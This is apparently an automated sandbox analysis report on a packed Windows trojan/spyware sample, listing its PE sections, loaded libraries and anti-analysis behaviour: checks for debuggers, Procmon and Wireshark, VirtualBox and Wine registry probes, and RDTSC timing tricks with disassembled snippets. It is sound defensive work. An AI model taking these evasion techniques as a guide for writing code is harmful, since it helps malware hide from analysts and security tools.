    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002E8F901_2_002E8F90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00572F901_2_00572F90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002310E61_2_002310E6
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0058D4301_2_0058D430
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005935B01_2_005935B0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005B17A01_2_005B17A0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002D98801_2_002D9880
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005799201_2_00579920
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A3A701_2_005A3A70
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00591BD01_2_00591BD0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00261BE01_2_00261BE0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00587CC01_2_00587CC0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_004D9C801_2_004D9C80
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00235DB01_2_00235DB0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00245EB01_2_00245EB0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00233ED01_2_00233ED0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 00264FD0 appears 288 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 003D7220 appears 99 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 00264F40 appears 332 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 00265340 appears 50 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0023CCD0 appears 55 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002275A0 appears 706 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0022C960 appears 37 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 003044A0 appears 76 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002273F0 appears 114 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002271E0 appears 47 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0022CAA0 appears 64 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 003FCBC0 appears 90 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002650A0 appears 101 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0023CD40 appears 80 times
    Source: FYQ6Ee6gbS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: FYQ6Ee6gbS.exeStatic PE information: Section: bqmneslf ZLIB complexity 0.9946908708756346
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_002229FF
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: FYQ6Ee6gbS.exeVirustotal: Detection: 50%
    Source: FYQ6Ee6gbS.exeReversingLabs: Detection: 70%
    Source: FYQ6Ee6gbS.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: FYQ6Ee6gbS.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: FYQ6Ee6gbS.exeStatic file information: File size 4487168 > 1048576
    Source: FYQ6Ee6gbS.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288800
    Source: FYQ6Ee6gbS.exeStatic PE information: Raw size of bqmneslf is bigger than: 0x100000 < 0x1bb400

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeUnpacked PE file: 1.2.FYQ6Ee6gbS.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bqmneslf:EW;xbtqkxjw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bqmneslf:EW;xbtqkxjw:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: FYQ6Ee6gbS.exeStatic PE information: real checksum: 0x45410a should be: 0x44d390
    Source: FYQ6Ee6gbS.exeStatic PE information: section name:
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: .idata
    Source: FYQ6Ee6gbS.exeStatic PE information: section name:
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: bqmneslf
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: xbtqkxjw
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_014F5BF5 push ss; ret 1_3_014F5CE1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_014F5E72 push edx; ret 1_3_014F5EC1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_014F5BF5 push ss; ret 1_3_014F5CE1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_014F5E72 push edx; ret 1_3_014F5EC1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_015562C4 push eax; ret 1_3_015562CB
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_0155A5C2 push esp; iretd 1_3_0155AA4F
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_0155B380 push esp; iretd 1_3_0155B381
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_015562C4 push eax; ret 1_3_015562CB
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_0155A5C2 push esp; iretd 1_3_0155AA4F
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_0155B380 push esp; iretd 1_3_0155B381
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A41D0 push eax; mov dword ptr [esp], edx1_2_005A41D5
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002A2340 push eax; mov dword ptr [esp], 00000000h1_2_002A2343
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002DC7F0 push eax; mov dword ptr [esp], 00000000h1_2_002DC743
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00260AC0 push eax; mov dword ptr [esp], 00000000h1_2_00260AC4
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00281430 push eax; mov dword ptr [esp], 00000000h1_2_00281433
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002A39A0 push eax; mov dword ptr [esp], 00000000h1_2_002A39A3
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0027DAD0 push eax; mov dword ptr [esp], edx1_2_0027DAD1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A9F40 push dword ptr [eax+04h]; ret 1_2_005A9F6F
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: bqmneslf entropy: 7.9570043649451305

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F6912 second address: 9F6928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418AEFE50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F6928 second address: 9F696B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE81h 0x00000007 pushad 0x00000008 jbe 00007FB418E0AE76h 0x0000000e jmp 00007FB418E0AE7Ch 0x00000013 jc 00007FB418E0AE76h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB418E0AE7Bh 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F696B second address: 9F696F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9EB38A second address: 9EB39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jns 00007FB418E0AE76h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9EB39A second address: 9EB3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jo 00007FB418AEFE46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9EB3AC second address: 9EB3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007FB418E0AE89h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9EB3D5 second address: 9EB3DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F5A50 second address: 9F5AA6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E0AE76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB418E0AE83h 0x00000012 jmp 00007FB418E0AE80h 0x00000017 pop eax 0x00000018 popad 0x00000019 push esi 0x0000001a jo 00007FB418E0AE89h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FB418E0AE81h 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007FB418E0AE76h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F5DFA second address: 9F5E04 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB418AEFE46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F5F53 second address: 9F5F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F5F59 second address: 9F5F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F5F5D second address: 9F5F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F83E7 second address: 9F83ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F83ED second address: 9F848F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 19C6CDF5h 0x00000013 mov dword ptr [ebp+122D17C2h], edi 0x00000019 push 00000003h 0x0000001b and dh, FFFFFFD5h 0x0000001e push 00000000h 0x00000020 adc si, 6B07h 0x00000025 push 00000003h 0x00000027 mov dword ptr [ebp+122D1908h], ebx 0x0000002d push 839853C9h 0x00000032 pushad 0x00000033 jl 00007FB418E0AE78h 0x00000039 pushad 0x0000003a popad 0x0000003b jmp 00007FB418E0AE85h 0x00000040 popad 0x00000041 xor dword ptr [esp], 439853C9h 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FB418E0AE78h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 lea ebx, dword ptr [ebp+12447273h] 0x00000068 jmp 00007FB418E0AE82h 0x0000006d mov di, dx 0x00000070 xchg eax, ebx 0x00000071 pushad 0x00000072 push edi 0x00000073 push esi 0x00000074 pop esi 0x00000075 pop edi 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F848F second address: 9F8493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F8493 second address: 9F84A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB418E0AE7Ah 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F8506 second address: 9F8523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F8523 second address: 9F8527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F8527 second address: 9F852B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F852B second address: 9F8531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F8667 second address: 9F8683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB418AEFE4Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F86C2 second address: 9F8754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edx, ax 0x00000010 push 00000000h 0x00000012 jmp 00007FB418E0AE89h 0x00000017 push AB3FF551h 0x0000001c push edi 0x0000001d jmp 00007FB418E0AE81h 0x00000022 pop edi 0x00000023 add dword ptr [esp], 54C00B2Fh 0x0000002a xor edx, dword ptr [ebp+122D2B66h] 0x00000030 push 00000003h 0x00000032 call 00007FB418E0AE83h 0x00000037 adc cx, 1B24h 0x0000003c pop esi 0x0000003d push 00000000h 0x0000003f xor ecx, 7CB1A1B1h 0x00000045 push 00000003h 0x00000047 mov edi, dword ptr [ebp+122D17DFh] 0x0000004d call 00007FB418E0AE79h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F8754 second address: 9F875F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB418AEFE46h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F875F second address: 9F87B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FB418E0AE76h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB418E0AE88h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 je 00007FB418E0AE8Bh 0x0000001c jmp 00007FB418E0AE85h 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 jnp 00007FB418E0AE7Ch 0x0000002b jp 00007FB418E0AE76h 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A0B0A5 second address: A0B0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB418AEFE46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A0B0AF second address: A0B0B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A0B0B3 second address: A0B0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB418AEFE54h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FB418AEFE46h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1AFE4 second address: A1AFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9E65F1 second address: 9E6607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB418AEFE4Dh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A18BC7 second address: A18BEF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418E0AE78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FB418E0AE84h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A18BEF second address: A18BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A18D45 second address: A18D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB418E0AE76h 0x0000000a pop edi 0x0000000b push ebx 0x0000000c jmp 00007FB418E0AE7Eh 0x00000011 ja 00007FB418E0AE76h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A18EEC second address: A18EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB418AEFE46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A18EF8 second address: A18EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A194B6 second address: A194BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A194BA second address: A194C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
